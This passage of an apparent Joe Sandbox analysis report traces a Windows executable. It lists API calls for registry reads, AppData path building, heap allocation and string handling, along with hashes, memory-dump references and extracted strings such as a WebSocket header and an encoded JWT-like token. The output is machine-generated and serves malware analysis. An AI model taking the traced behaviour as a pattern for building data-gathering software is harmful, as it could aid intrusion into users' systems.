                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00451BC6
                            • ExitProcess.KERNEL32 ref: 00451BE3
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: 8468909866a91b820bf2e5189f9f982fc6987bb22e1e7adab5879c26596e0674
                            • Instruction ID: fab564feff4e25f15f9dc03c1c48a4ca9f3dc58daf690b8337233a564a3016a4
                            • Opcode Fuzzy Hash: 8468909866a91b820bf2e5189f9f982fc6987bb22e1e7adab5879c26596e0674
                            • Instruction Fuzzy Hash: 9921E4B1518301AF8750EF65D88495FBBF9EFD8314F409A1EF999C3220E774E5088BA6
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00453166
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0045316D
                            • RegOpenKeyExA.ADVAPI32(80000002,00FEBAE0,00000000,00020119,?), ref: 0045318C
                            • RegQueryValueExA.ADVAPI32(?,00FFE130,00000000,00000000,00000000,000000FF), ref: 004531A7
                            • RegCloseKey.ADVAPI32(?), ref: 004531B1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: becb4f27c76814e02737689d6aecc2ed18de2eb30ee6a643b159f35e2499d554
                            • Instruction ID: a179ce72085c39685ca53d4c48a9729b3015ab268faeaca76fc994d498418139
                            • Opcode Fuzzy Hash: becb4f27c76814e02737689d6aecc2ed18de2eb30ee6a643b159f35e2499d554
                            • Instruction Fuzzy Hash: 51114276A40205AFD710CF94DD45FABBBBDE784711F10421AFE05D3780DBB559048BA1
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00438996
                              • Part of subcall function 0045A1C0: std::exception::exception.LIBCMT ref: 0045A1D5
                              • Part of subcall function 0045A1C0: std::exception::exception.LIBCMT ref: 0045A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 004389CD
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A188
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: 7e01cf0bcc2c4ef6a285c61639abe4486b8432ec3925e0536b977cdf44cf0bb6
                            • Instruction ID: 238c5f3e2e0c5d03ce533cab4a8fa327ea832dfee80384e7f1da0074fae724b6
                            • Opcode Fuzzy Hash: 7e01cf0bcc2c4ef6a285c61639abe4486b8432ec3925e0536b977cdf44cf0bb6
                            • Instruction Fuzzy Hash: 5C21D6723007504BC7209A6CE840B6AF7999FA5761F20193FF151CB281CB79D841C3AE
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00438883
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A188
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 88cae1d8b3771c5f810bc4e8352331c6b063dcdff9631a1a00ae5e2dc3aa52f8
                            • Instruction ID: 75c536193e2baf0be8b90b08000bb08a208da0b329c2c77036fca46034d5ec6b
                            • Opcode Fuzzy Hash: 88cae1d8b3771c5f810bc4e8352331c6b063dcdff9631a1a00ae5e2dc3aa52f8
                            • Instruction Fuzzy Hash: 8F31E9B5E005159FCB08DF58C8916AEBBB2EB88310F14822EE905DF344DB34AD01CBD5
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00455922
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A188
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A1AE
                            • std::_Xinvalid_argument.LIBCPMT ref: 00455935
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
                            • Opcode ID: a56fee46e49404f7f551aea26e56d31bd90ff5fe8f70ee41d01f90b2640ebfc0
                            • Instruction ID: cad53b8e42b4fe4399f1088381507abe4683406e451bc6a26ac1e9b8c9277670
                            • Opcode Fuzzy Hash: a56fee46e49404f7f551aea26e56d31bd90ff5fe8f70ee41d01f90b2640ebfc0
                            • Instruction Fuzzy Hash: C5115170304B40CBC7218A2CE91072A77E1ABD2B62F250A5FE89187696D769D849C7A9
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0045A430,000000FF), ref: 00453D20
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00453D27
                            • wsprintfA.USER32 ref: 00453D37
                              • Part of subcall function 004571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004571FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: de2117036833f2fcc90ccf88bacbe350fdae0faf6ee09894f3d50ab6256d83a2
                            • Instruction ID: 6fc157d0916a85224c15ba73be6113a08582d5e2e09afe1a751031afc2297f75
                            • Opcode Fuzzy Hash: de2117036833f2fcc90ccf88bacbe350fdae0faf6ee09894f3d50ab6256d83a2
                            • Instruction Fuzzy Hash: 4601AD71644600BFE7205B649C0AF6ABB7DFB45B62F10021AFE05972D0DAF41900C6A6
                            APIs
                            • __getptd.LIBCMT ref: 00459279
                              • Part of subcall function 004587FF: __amsg_exit.LIBCMT ref: 0045880F
                            • __amsg_exit.LIBCMT ref: 00459299
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit$__getptd
                            • String ID: XuF$XuF
                            • API String ID: 441000147-2164418370
                            • Opcode ID: 054e5329693bbd4d8ac6dfd7ade7838813840e8aa53d1b0bfbb1b7ac1b9dbb72
                            • Instruction ID: ee2719aee3850ffa1c3d6cf265452440bfc8c555ad50f4530c3b99170d7f4a69
                            • Opcode Fuzzy Hash: 054e5329693bbd4d8ac6dfd7ade7838813840e8aa53d1b0bfbb1b7ac1b9dbb72
                            • Instruction Fuzzy Hash: B7016532909711FBD711BB69980575E73906F04B1AF18046FFC0067692DB6C6D4ACBDE
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00438737
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A188
                              • Part of subcall function 0045A173: std::exception::exception.LIBCMT ref: 0045A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 74b349fd9a98aaa2c8a9addd3dfe214bf231211c60db4c86ceb1e82e7f08b8b6
                            • Instruction ID: d0ff995166c3d1c5fea7a364c36af1a3f79486832f461937dae4d4de7bf6f80e
                            • Opcode Fuzzy Hash: 74b349fd9a98aaa2c8a9addd3dfe214bf231211c60db4c86ceb1e82e7f08b8b6
                            • Instruction Fuzzy Hash: C0F09037B001211F8354643E8D8445FE94757E939073AE72AF81AEF359ED74EC8285D9
                            APIs
                              • Part of subcall function 0045781C: __mtinitlocknum.LIBCMT ref: 00457832
                              • Part of subcall function 0045781C: __amsg_exit.LIBCMT ref: 0045783E
                            • ___addlocaleref.LIBCMT ref: 00458756
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                            • String ID: KERNEL32.DLL$XuF$xtF
                            • API String ID: 3105635775-4132113681
                            • Opcode ID: 352a208bdc6ca3cfb6f7770c04082214013d7fbd044bff3bf33e78c35c1427b8
                            • Instruction ID: 505e91be1e22b0252284a13656f34d7df01cb35cb214148e89496ffa9b44c7a3
                            • Opcode Fuzzy Hash: 352a208bdc6ca3cfb6f7770c04082214013d7fbd044bff3bf33e78c35c1427b8
                            • Instruction Fuzzy Hash: 6401DF71444700DEE720AF76D805709F7E0AF50319F20895FE8D6676E2CFB8A548CB19
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044E544
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E573
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E581
                            • lstrcat.KERNEL32(?,00FFE290), ref: 0044E59C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: e14abcf4f2dcd40a1c63fbec6eade34415c38c316accf3a1230865fa46155e1c
                            • Instruction ID: 9f0f8fdd961b0061cec2c7a9f75340c01d2a7a8779251077ad70d7e0ac141852
                            • Opcode Fuzzy Hash: e14abcf4f2dcd40a1c63fbec6eade34415c38c316accf3a1230865fa46155e1c
                            • Instruction Fuzzy Hash: 3051D972A10208AFDB54EB65DC82EEE337DFB4C304F44159EF90587251DEB4AE448BA4
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00451FDF, 00451FF5, 004520B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            • Opcode ID: ebadeb12b4942de9ca8484b27f1a0b5c5df27c9ac6c81f8c2e63fc6447b5d55c
                            • Instruction ID: cb281b96b276f9a7590528c16d64c4267f1c8c12ac89eb1397a3a1c2f3668b19
                            • Opcode Fuzzy Hash: ebadeb12b4942de9ca8484b27f1a0b5c5df27c9ac6c81f8c2e63fc6447b5d55c
                            • Instruction Fuzzy Hash: 8A2125355111899BDB20AB35C5846EEB3A6DB81B63F844057CE180B2C3E3BA190ED79E
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044EBB4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044EBE3
                            • lstrcat.KERNEL32(?,00000000), ref: 0044EBF1
                            • lstrcat.KERNEL32(?,00FFF310), ref: 0044EC0C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: cd56d7f0dc3fa182a2cedb41915dd6eab1fc78deb693adc0d423e7d2a645ab3d
                            • Instruction ID: e062df2425d526ab77762be27f518eb8cbe242d2d4798082671e19ef003f2b2b
                            • Opcode Fuzzy Hash: cd56d7f0dc3fa182a2cedb41915dd6eab1fc78deb693adc0d423e7d2a645ab3d
                            • Instruction Fuzzy Hash: A231A671A10118ABDB25FB65DD41BEE73B9FF4C300F1014AEFA1697250DEB4AE448B94
